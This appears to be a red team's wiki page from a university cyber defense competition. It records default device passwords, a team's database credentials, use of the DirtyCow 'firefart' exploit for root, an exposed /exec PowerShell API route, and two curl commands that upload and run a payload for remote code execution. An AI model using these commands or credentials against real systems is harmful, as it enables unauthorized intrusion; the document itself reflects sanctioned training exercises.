Red Wiki

Thank you for competing!
Competition Information
Uploaded Files: Scenario (3).pdf
Add content here...
Flag Locations
Add content here...
Team Wiki Pages

Team 1:    None

Team 3:    None

Team 4:    None

Team 5:    None

Team 40:    None

General Help and Information
camera root pass: 12345678
also cdc:cdc
also depiglio:depiglio

Camera kernel version is vulnerable to DirtyCow (it's from 2013). Used firefart PoC on team 4 to rename root to firefart with password toor.

Found some documentation related to the api:
[GIN-debug] POST   /animal/                  --> git.iseage.org/isu2_21/animal-management/internal/app/router.createAnimalHandler (3 handlers)
[GIN-debug] DELETE /animal/:id               --> git.iseage.org/isu2_21/animal-management/internal/app/router.deleteAnimalHandler (3 handlers)
[GIN-debug] GET    /animal/                  --> git.iseage.org/isu2_21/animal-management/internal/app/router.getAnimalsHandler (3 handlers)
[GIN-debug] GET    /animal/:id               --> git.iseage.org/isu2_21/animal-management/internal/app/router.getAnimalHandler (3 handlers)
[GIN-debug] PATCH  /animal/:id               --> git.iseage.org/isu2_21/animal-management/internal/app/router.patchAnimalHandler (3 handlers)
[GIN-debug] POST   /enclosure/               --> git.iseage.org/isu2_21/animal-management/internal/app/router.createEnclosureHandler (3 handlers)
[GIN-debug] DELETE /enclosure/:id            --> git.iseage.org/isu2_21/animal-management/internal/app/router.deleteEnclosureHandler (3 handlers)
[GIN-debug] GET    /enclosure/               --> git.iseage.org/isu2_21/animal-management/internal/app/router.getEnclosuresHandler (3 handlers)
[GIN-debug] GET    /enclosure/:id            --> git.iseage.org/isu2_21/animal-management/internal/app/router.getEnclosureHandler (3 handlers)
[GIN-debug] PATCH  /enclosure/:id            --> git.iseage.org/isu2_21/animal-management/internal/app/router.patchEnclosureHandler (3 handlers)
[GIN-debug] GET    /exec                     --> git.iseage.org/isu2_21/animal-management/internal/app/router.Powershell (3 handlers)
[GIN-debug] GET    /c/*filepath              --> github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (3 handlers)
[GIN-debug] HEAD   /c/*filepath              --> github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (3 handlers)
[GIN-debug] GET    /upload/*filepath         --> github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (3 handlers)
[GIN-debug] HEAD   /upload/*filepath         --> github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (3 handlers)
[GIN-debug] POST   /upload                   --> git.iseage.org/isu2_21/animal-management/internal/app/router.Router.func1 (3 handlers)


Team 3 database creds:
database:
  type: "mssql"
  host: "192.168.1.50"
  port: "1434"
  username: "sa"
  password: "Nq81Hv50#!"
  db-name: "cdc"
server:
  port: "8080"

RCE on API:
curl api.teamN.isucdc.com/upload -F "file=@payload.ps1"
curl api.teamN.isucdc.com/exec -X GET -d '{"file": "payload.ps1"}'
#whatahack